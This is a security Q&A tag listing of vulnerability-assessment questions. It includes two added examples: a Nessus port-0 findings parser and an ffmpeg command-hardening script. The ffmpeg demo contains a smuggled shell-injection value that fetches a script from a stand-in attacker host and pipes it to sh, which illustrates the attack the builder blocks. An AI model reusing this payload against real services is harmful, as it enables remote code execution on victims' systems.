Questions tagged [vulnerability-assessment]
74 questions
108 votes, 15 answers
How can I argue against: "System is unhackable so why patch vulnerabilities?"
An operating system has reached End of Support (EoS) so no more security patches are coming for the OS ever. An embedded device running this OS needs to be updated to a newer version. However, the engineers who designed the original product feel…
Ken
25 votes, 4 answers
Should a vulnerability in a service that is present on the device, but not running and not used at all, be mentioned in the vulnerability report?
Say, I have scanned our Cisco router, and it returned 20 vulnerabilities. However, most of them are tied to specific services that this router is not running, for example CVE-2016-6380: we are not running a DNS server on our Cisco, thus we are…
shivelin
12 votes, 2 answers
Tons of vulnerabilities are found on tcp/0 port using vulnerability scanners
Performed a credentialed vulnerability scan on Linux/Unix servers with Nessus, and thousands of vulnerabilities came out on port tcp/0. How could an IANA-reserved port (tcp/0) handle traffic? Are those vulnerabilities truly countable, or did they come out as false…
Shakir
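Nessus reports port 0 for plugins that are local (credentialed) checks, such as installed-package version tests, rather than for anything observed on a socket, so those findings belong to the host, not to a listener. The following script, an added example that is not code from the question or from Tenable, parses a constructed `.nessus` export and separates the two kinds of findings so the "port tcp/0" items can be counted as host-level results and everything else reconciled against the host's real open ports. The element and attribute names follow the `NessusClientData_v2` format; the plugin IDs and names in the sample are made up.

```python
"""Sort Nessus findings reported on tcp/0 out from findings tied to a real listener.

Added example, not code from the original question. Nessus reports port 0 for
plugins that are local (credentialed) checks such as installed-package version
tests, not for traffic on a socket, so they should be counted as host-level
findings rather than as an open port. The .nessus document below is constructed.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict

SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
 <Report name="constructed-scan">
  <ReportHost name="10.0.0.5">
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="3"
               pluginID="900001" pluginName="Example local check: outdated package A"/>
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="2"
               pluginID="900002" pluginName="Example local check: outdated package B"/>
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
               pluginID="900003" pluginName="Example informational plugin"/>
   <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="1"
               pluginID="900004" pluginName="Example SSH service check"/>
  </ReportHost>
 </Report>
</NessusClientData_v2>
"""


def classify_findings(xml_text, min_severity=1):
    """Return {'local_checks': [...], 'by_listener': {'tcp/22': [...]}}.

    Each record is (host, pluginID, pluginName, severity). Items reported on
    port 0 are host-level (credentialed) results; everything else is grouped
    by protocol/port so it can be reconciled against the host's open ports.
    Findings below min_severity (Nessus 0 = informational) are dropped.
    """
    root = ET.fromstring(xml_text)
    local_checks = []
    by_listener = defaultdict(list)
    for host in root.iter("ReportHost"):
        for item in host.iter("ReportItem"):
            severity = int(item.get("severity", "0"))
            if severity < min_severity:
                continue
            record = (host.get("name"), item.get("pluginID"),
                      item.get("pluginName"), severity)
            if int(item.get("port", "0")) == 0:
                local_checks.append(record)
            else:
                key = f"{item.get('protocol', 'tcp')}/{item.get('port')}"
                by_listener[key].append(record)
    return {"local_checks": local_checks, "by_listener": dict(by_listener)}


def summarize(xml_text):
    """Counts that answer 'how many of these are really port findings?'."""
    findings = classify_findings(xml_text)
    return {
        "host_level": len(findings["local_checks"]),
        "network": {port: len(items) for port, items in findings["by_listener"].items()},
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_NESSUS))
```

The port-0 findings are not false positives just because nothing listens on port 0; a credentialed check that finds a vulnerable package version is a real host finding, it simply has no listener to attach to. What does need verifying is whether the vulnerable component is actually reachable or in use, which is a separate question from the port the scanner filed it under.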
9 votes, 3 answers
Is "Discoverability = low" an acceptable reason to reduce the risk of a vulnerability?
The outdated DREAD risk model (Wikipedia) lists Discoverability as a criterion for judging the severity of a vulnerability, the idea being that something which is not publicly known and you would be unlikely to discover without deep knowledge of the…
Mike Ounsworth
8 votes, 1 answer
Security risks of using ffmpeg as part of web service
I'm working on a web service that uses ffmpeg on the backend for processing user-uploaded media files. I'm giving the users some options to customize how their videos are processed, which essentially parameterizes the ffmpeg command.
I'm planning…
leros
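The usual mistake when "parameterizing the ffmpeg command" is to interpolate the user's choices into one string that a shell then parses. The example below, added here and not the poster's code, puts the anti-pattern next to a hardened builder: an allowlist of option names with a strict pattern per value, an argv list passed with `shell=False`, file names anchored so a leading `-` cannot become an option, and `-protocol_whitelist file` so a crafted input or playlist cannot make ffmpeg open other protocols. The option names, value patterns and the local-files-only assumption are choices made for this illustration, not the poster's feature set.

```python
"""Parameterising an ffmpeg command from user input without handing the user a shell.

Added example, not the original poster's code. Option names and the value
patterns are assumptions for a small transcoding feature; a real service
would carry its own allowlist. Only the argv construction is exercised here;
run_ffmpeg() needs an ffmpeg binary on PATH.
"""
import re
import subprocess

# Every option a client may influence, with the exact shape its value must have.
# Anything not listed here is never passed to ffmpeg.
ALLOWED_OPTIONS = {
    "scale":  re.compile(r"\d{1,4}:\d{1,4}"),                  # width:height
    "crf":    re.compile(r"(?:[0-9]|[1-4][0-9]|5[01])"),        # 0..51
    "preset": re.compile(r"(?:ultrafast|veryfast|fast|medium|slow)"),
}


def vulnerable_command(user_opts, in_path, out_path):
    """The anti-pattern: values interpolated into one string that a shell will parse."""
    return "ffmpeg -i {} -vf scale={} -crf {} {}".format(
        in_path, user_opts.get("scale", "640:360"), user_opts.get("crf", "23"), out_path)


def option_errors(user_opts):
    """List every reason the client-supplied options are unacceptable (empty = OK)."""
    errors = []
    for key, value in user_opts.items():
        pattern = ALLOWED_OPTIONS.get(key)
        if pattern is None:
            errors.append(f"option not permitted: {key!r}")
        elif not isinstance(value, str) or not pattern.fullmatch(value):
            errors.append(f"bad value for {key}: {value!r}")
    return errors


def anchor_path(path):
    """A file name beginning with '-' would be read as an option; anchor it to a directory."""
    return "./" + path if path.startswith("-") else path


def build_ffmpeg_argv(user_opts, in_path, out_path):
    """Build an argv list; each element reaches ffmpeg verbatim, nothing is shell-parsed."""
    errors = option_errors(user_opts)
    if errors:
        raise ValueError("; ".join(errors))
    argv = ["ffmpeg", "-nostdin", "-y",
            # Assumption: inputs are uploaded local files, so refuse every other
            # protocol (http, concat, ...) that an input or playlist might try to open.
            "-protocol_whitelist", "file",
            "-i", anchor_path(in_path)]
    if "scale" in user_opts:
        argv += ["-vf", "scale=" + user_opts["scale"]]
    if "crf" in user_opts:
        argv += ["-crf", user_opts["crf"]]
    if "preset" in user_opts:
        argv += ["-preset", user_opts["preset"]]
    argv.append(anchor_path(out_path))
    return argv


def run_ffmpeg(argv, timeout=300):
    """shell=False plus a timeout: no shell metacharacters, no runaway encode."""
    return subprocess.run(argv, shell=False, check=True, timeout=timeout, capture_output=True)


if __name__ == "__main__":
    # Constructed hostile input: a shell would run the pipeline after the ';'.
    evil = {"scale": "640:360; curl http://attacker.example/x | sh", "crf": "23"}
    print(vulnerable_command(evil, "in.mp4", "out.mp4"))
    print(option_errors(evil))
    print(build_ffmpeg_argv({"scale": "640:360", "crf": "23"}, "-upload.mp4", "out.mp4"))
```

Even with injection removed, ffmpeg itself parses untrusted containers and codecs, so the process should also run with a timeout, a memory and CPU limit, no network, and ideally in a sandbox or separate worker; the argv discipline above only closes the command-construction hole.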
6 votes, 1 answer
What exactly is CVE-2021-23978 (from MSFA2021-08 in Mozilla Firefox)?
A number of vulnerabilities were fixed in Firefox in the latest update. MSFA2021-08 describes it only as "memory issues that may be exploitable", and doesn't give any information:
Mozilla developers Alexis Beingessner, Tyson Smith, Nika Layzell,…
forest
5 votes, 2 answers
Vulnerable framework and IIS server versions are being displayed in an error page of a 3rd party application
As a security tester, I need to report and justify that a security misconfiguration in a 3rd party application is a risk to us.
Following is the scenario:
1.) There is a 3rd party application which the customers use to submit their applications to…
Sai Dutt Mekala
5 votes, 2 answers
Why do the CVSS scores differ so much between the Red Hat and NVD pages?
Take CVE-2016-7872 for example.
On the National Vulnerability Database web page, we can see that the CVSS2 and CVSS3 scores are 9.8 and 10.0 respectively.
But on the Red Hat security advisory page, they are 6.8 and 8.8.
To my understanding, CVSS scores are…
Sajuuk
5 votes, 2 answers
How do pentesters approach a large complex network?
Lots of books talk about using tools such as whois and other information gathering tools to collect information on the network and of course, not forgetting nmap. However, in a real network with such a large number of hosts, wouldn't there be an…
Lew Wei Hao
4 votes, 2 answers
OpenVAS won't generate SCAP Database
To deploy OpenVAS to virtual machines I've been using Ansible for a while and it worked pretty well. Now today I wanted to deploy it to another machine but the openvas-check-setup script keeps telling me that the setup isn't yet finished because the…
davidb
4 votes, 3 answers
How to maintain balance between integrity and client satisfaction in vulnerability assessments
I have done a number of vulnerability assessments and I'm noticing a trend. In the first assessment the clients are impressed and grateful for the massive security holes I find. During the second and third assessments, they feel frustrated because…
user3280964
4 votes, 2 answers
Buffer Overflow doesn't have enough space for exploit after being crashed
So I'm trying to write a buffer overflow for a known-vulnerable server application; I want to learn how to do this on my own and just want some direction.
I'm watching it in Immunity Debugger on the server and have control over the ECX, EBP, and…
Hadoken
4 votes, 2 answers
Way of categorising and organising types of security issues and areas
I have recently done a security review and uncovered 200 or so areas to improve upon, covering a very diverse range of topics. Some points are process, some are config, some are new systems to be implemented. Everything from SAST, architecture to…
ZZ9
3 votes, 4 answers
Risk of web admin portal without extra authentication steps
More of a philosophical question: suppose there is one behavior which allows an attacker to do something with high impact but by itself cannot be used to cause that impact. For example, an internet-accessible admin portal which, even though still…
thevpt
3 votes, 0 answers
Version earlier than 0 in Debian OVAL feeds
I'm trying to parse Debian OVAL feeds to establish if some packages are vulnerable or not. I'm using criterions to establish what's the vulnerable version for a package, however often there are entries saying that "version is earlier than 0", e.g.
…
Lyubomir Raykov